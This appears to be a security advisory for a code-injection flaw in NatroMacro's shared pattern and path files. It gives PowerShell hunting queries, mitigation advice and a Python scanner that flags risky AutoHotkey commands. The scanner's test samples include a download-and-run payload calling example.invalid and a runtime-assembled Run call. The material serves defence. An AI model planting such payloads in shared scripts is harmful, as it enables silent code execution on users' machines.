CVE-2026-28801 affects NatroMacro, an open-source macro tool for Bee Swarm Simulator. The vulnerability allows an attacker to inject and execute malicious code through shared pattern or path files, leading to unauthorized actions with the privileges of the user running the application. Versions of NatroMacro prior to 1.1.0 are vulnerable; the fix ships in version 1.1.0.
The primary impact of CVE-2026-28801 is arbitrary code execution on a victim's system. Because NatroMacro users routinely exchange pattern and path files, an attacker can craft a file containing malicious AutoHotkey code and distribute it to unsuspecting users. When the victim loads the file in a vulnerable NatroMacro, the embedded code runs silently in the background with the privileges of the user who runs the macro. This could lead to data theft, system manipulation, or remote control of the affected machine. The blast radius extends to anyone running a vulnerable version who accepts pattern or path files from others.
This vulnerability was publicly disclosed on 2026-03-06. There are currently no known public exploits or active campaigns targeting CVE-2026-28801. It is not listed on the CISA KEV catalog. The ease of exploitation stems from the common practice of sharing files among NatroMacro users, making it a potentially attractive target for opportunistic attackers.
Bee Swarm Simulator players who actively share NatroMacro pattern and path files are at the highest risk. Users who download files from untrusted sources or participate in online communities where file sharing is common are particularly vulnerable. Legacy NatroMacro installations that have not been updated are also at risk.
• windows / supply-chain:
Get-Process -Name NatroMacro | Select-Object -ExpandProperty Path
• windows / supply-chain:
Get-ScheduledTask | Where-Object {$_.TaskName -like '*NatroMacro*'}
• windows / supply-chain:
Get-ItemProperty 'HKCU:\Software\NatroMacro' -Name 'LastRun'
These hunting queries assume a process, scheduled task and registry key named after NatroMacro; since the tool is AutoHotkey-based, the running process may instead appear under the AutoHotkey interpreter's name, so adapt the names to how the tool is actually installed on the host.
Disclosure
Exploitation status
EPSS: 0.02% (5th percentile)
CISA SSVC
CVSS vector
The definitive mitigation for CVE-2026-28801 is to upgrade NatroMacro to version 1.1.0 or later. If upgrading is not immediately feasible, treat pattern and path files from untrusted sources as untrusted code: do not load them at all, or review them first for AutoHotkey constructs that do more than press keys (process launches, DLL and COM calls, downloads, file and registry writes, includes). A WAF rule does not apply to a desktop tool, but monitoring for unusual child processes or network connections originating from the NatroMacro process can provide an early warning. After upgrading, confirm the fix in an isolated test environment with a harmless canary file that carries only a visible marker action (such as a message box) in the position where injected code would run; on 1.1.0 or later the marker must not execute. Do not use a real malicious sample for this check.
Update NatroMacro to version 1.1.0 or later. This version fixes the code-injection vulnerability by preventing malicious AutoHotkey code contained in third-party shared pattern or path files from executing.
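The review step suggested above, as an added example that is not NatroMacro's own code or part of the advisory: a small static triage scanner for shared pattern/path files. It assumes these files are plain AutoHotkey source text (the page describes the payload as AutoHotkey code); the token list `RISKY_TOKENS`, the functions `scan` and `review`, the sample files and the URL `example.invalid` are all constructed for illustration. It strips AutoHotkey comments, flags commands that let a script do more than press keys, and separately flags dynamic calls that can hide such a command behind a runtime-built name. It is a heuristic for triage, not a substitute for upgrading to 1.1.0.

```python
import re
from collections import namedtuple

# AutoHotkey commands/functions that let a script do more than press keys.
# Assumption: a legitimate pattern needs none of these. Reviewer's triage
# set covering v1 and v2 spellings, not a complete list.
RISKY_TOKENS = {
    "process": ["Run", "RunWait", "ExecScript"],
    "native": ["DllCall", "ComObjCreate", "ComObject", "ComObjGet", "ComObjActive"],
    "network": ["URLDownloadToFile", "Download"],
    "disk": ["FileDelete", "FileMove", "FileCopy", "FileAppend",
             "FileInstall", "FileRecycle", "FileRemoveDir", "IniWrite"],
    "registry": ["RegWrite", "RegDelete", "RegDeleteKey"],
    "include": ["#Include", "#IncludeAgain"],
}

# Whole-word, case-insensitive (AutoHotkey names are case-insensitive).
# The lookbehind excludes '#' so '#Include' is matched only by its own token.
_TOKEN_RE = {
    category: re.compile(
        r"(?<![\w#])(?:" + "|".join(re.escape(t) for t in tokens) + r")(?!\w)",
        re.IGNORECASE,
    )
    for category, tokens in RISKY_TOKENS.items()
}

# Dynamic calls assemble a command name at runtime and evade the literal
# token check: v2 '%name%(...)' and v1 'Func("name")'.
_DYNAMIC_RE = re.compile(r"%[A-Za-z_]\w*%\s*\(|\bFunc\s*\(", re.IGNORECASE)

Finding = namedtuple("Finding", "line category token snippet")


def strip_comments(text):
    """Return (line_number, code) pairs with ';' line comments (at line start
    or after whitespace) and '/* ... */' block comments removed."""
    code_lines = []
    in_block = False
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if in_block:
            if stripped.startswith("*/"):
                in_block = False
            continue
        if stripped.startswith("/*"):
            in_block = True
            continue
        code = re.sub(r"(^|\s);.*$", r"\1", line)
        if code.strip():
            code_lines.append((lineno, code))
    return code_lines


def scan(text):
    """Return every risky token and dynamic call found in the script text."""
    findings = []
    for lineno, code in strip_comments(text):
        for category, regex in _TOKEN_RE.items():
            for match in regex.finditer(code):
                findings.append(Finding(lineno, category, match.group(0), code.strip()))
        for match in _DYNAMIC_RE.finditer(code):
            findings.append(Finding(lineno, "dynamic", match.group(0), code.strip()))
    return findings


def review(text):
    """Classify a shared file: 'block' (risky command), 'review' (only
    dynamic calls, needs a human look) or 'allow'."""
    findings = scan(text)
    if any(f.category != "dynamic" for f in findings):
        return "block", findings
    if findings:
        return "review", findings
    return "allow", findings


# Constructed sample inputs, not real NatroMacro files.
BENIGN = r"""; constructed: a pattern that only presses movement keys
Send "{w down}"
Sleep 500
Send "{w up}"
Send "{d down}"
Sleep 500
Send "{d up}"
"""

MALICIOUS = r"""; constructed: a payload hidden among movement keys
Send "{w down}"
Sleep 500
Send "{w up}"
Download("https://example.invalid/p.exe", A_Temp "\p.exe")  ; stage the payload
Run(A_Temp "\p.exe")
"""

OBFUSCATED = r"""Send "{w down}"
cmd := "Ru" "n"
%cmd%("calc.exe")  ; command name assembled at runtime, no literal Run
"""

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("malicious", MALICIOUS), ("obfuscated", OBFUSCATED)]:
        verdict, findings = review(sample)
        print(f"{name}: {verdict}")
        for f in findings:
            print(f"  line {f.line}: {f.category} '{f.token}' in: {f.snippet}")
```

A token inside a string literal (for example `Send "Run"`) is still flagged; that is intentional for triage, since the cost of a false positive is one human look, while the `review` verdict for dynamic calls exists because a string-only scanner cannot prove what a runtime-built name resolves to.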
CVE-2026-28801 is a medium-severity vulnerability in NatroMacro versions prior to 1.1.0 that allows code embedded in shared pattern or path files to be executed, potentially leading to unauthorized actions on the user's system.
You are affected if you run a NatroMacro version earlier than 1.1.0 and load pattern or path files obtained from other users.
Upgrade NatroMacro to version 1.1.0 or later to resolve this vulnerability. Exercise caution when opening files from untrusted sources until the upgrade is complete.
As of now, there are no known public exploits or active campaigns targeting CVE-2026-28801, but caution is advised.
Refer to the NatroMacro project's official repository or website for the latest advisory and release notes regarding CVE-2026-28801.